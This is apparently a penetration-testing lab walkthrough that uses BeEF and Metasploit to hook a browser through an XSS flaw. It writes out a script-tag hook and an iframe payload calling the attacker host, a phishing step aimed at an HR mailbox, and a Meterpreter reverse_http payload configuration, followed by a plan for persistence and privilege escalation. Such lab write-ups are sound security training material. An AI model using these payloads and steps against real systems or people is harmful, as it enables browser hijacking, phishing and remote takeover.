A Taste of the Browser Exploitation Framework (BeEF)¶
What is BeEF?¶
BeEF (Browser Exploitation Framework) is a powerful tool that allows penetration testers to assess the security of browser clients. It uses XSS (Cross-Site Scripting) vulnerabilities to hook the target's browser and control it remotely.
Using BeEF to Exploit a XSS Vuln¶
This walkthrough will use BeEF to exploit the XSS vulnerability outlined here.
- ATTACK_IP: 10.1.1.5
- pfSense: 10.1.1.40
- TARGET_IP (web server): 172.16.5.5
Configure and Start BeEF¶
1. View BeEF Configuration¶
$ less /opt/beef/config.yaml
Why?
Viewing the configuration file helps understand how BeEF is set up and configured, ensuring that it operates correctly within your network.
2. Modify the value for permitted_hooking_subnet
¶
- Value:
10.1.1.40/32
Why?
This setting restricts which IP addresses can be hooked by BeEF. It ensures only devices within the specified subnet are targeted, enhancing security by limiting exposure.
3. Modify the value for permitted_ui_subnet
¶
- Value:
127.0.0.1/32
Why?
This restricts access to the BeEF UI to the local machine, preventing unauthorized remote access to the control panel.
4. Identify Listening Port¶
- Port:
80
Why?
Knowing the port BeEF listens on is crucial for configuring firewalls and accessing the service correctly.
5. Check Hook File Setting¶
- Hook file:
/stats.js
Why?
This JavaScript file is used to hook the target browser. When loaded, it establishes a connection between the victim’s browser and the BeEF server.
6. Enable Metasploit Extension¶
- Value:
true
Why?
Integrating BeEF with Metasploit allows for advanced exploitation techniques, leveraging Metasploit’s extensive library of payloads and exploits.
7. View Metasploit Extension Configuration¶
$ less /opt/beef/extensions/metasploit/config.yaml
8. Check Metasploit Configuration¶
- Host:
127.0.0.1
- Port:
55552
- User:
msf
- Pass:
abc123
- SSL:
true
- Callback Host:
10.1.1.5
9. Create beef.rc
File¶
$ nano beef.rc
- Contents:
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y
Why?
This resource file automates the configuration of the Metasploit RPC server, streamlining the setup process.
10. Start Metasploit¶
$ msfconsole -r beef.rc
Why?
This command starts Metasploit with the settings specified in the beef.rc
file, preparing it for use with BeEF.
11. Start BeEF Docker Container¶
$ sudo docker start beef
Why?
This command starts the BeEF service, making it accessible for launching attacks and managing hooked browsers.
12. Access BeEF UI¶
- URL:
http://127.0.0.1/ui/panel
- Login using the attack box's credentials.
Why?
The BeEF UI is the control center where you manage hooked browsers and launch exploits.
Deliver the XSS Hook¶
13. Create HTML File for XSS Payload¶
$ nano stats.html
<script src="http://10.1.1.5/stats.js"></script>
Why?
This file contains the malicious JavaScript that hooks the target browser. When the file is loaded, it connects back to the BeEF server.
14. Host HTML File using Python Webserver¶
$ python3 -m http.server 80
Why?
Hosting the file on a web server makes it accessible to the target browser. Python's simple HTTP server is a quick and easy way to serve the file.
15. Exploit XSS Vulnerability¶
- On
www.targetwebdomain.com
, use the following payload in an iframe:<iframe src="http://10.1.1.5/stats.html"></iframe>
Why?
This leverages an existing XSS vulnerability on the target website to load the malicious JavaScript and hook the browser.
16. Phishing for Access¶
- Find internal email:
hr@targetwebdomain.com
- Mail server FQDN:
mail.targetwebdomain.com
- Mail server IP:
172.16.5.6
- Send a phishing email with a link to the XSS payload.
Why?
Phishing is a common technique to trick users into loading malicious content. By sending a crafted email, you entice the user to visit the link, triggering the XSS exploit.
17. Check for Hooked Browser in BeEF UI¶
- Once the target clicks the link, their browser should appear under "Online Browsers".
Exploit the Target with Metasploit¶
18. Search for Exploit¶
$ searchsploit chrome 80
Why?
Identifying an appropriate exploit for the target’s browser version.
19. Configure and Launch Exploit via BeEF¶
- Payload:
windows/x64/meterpreter/reverse_http
- SRVHOST:
10.1.1.5
- SRVPORT:
8080
- LHOST:
10.1.1.5
- LPORT:
8081
- URIPATH:
feeds
20. Obtain Meterpreter Session¶
- Check
msfconsole
for a new session.
21. Post-Exploitation¶
Now it's time to figure out what's on this box, what sort of privileges do we have, and how can we escalate those privileges, establish persistence, and exploit the network further. The Windows Privilege Escalation post will take these next steps:
- Migrate to a Stable Process: Ensure persistence by migrating to a stable system process.
- Perform Situational Awareness Checks: Gather information about the target system’s environment.
- Execute Additional Payloads (e.g., Empire): Further exploit the system using more advanced payloads.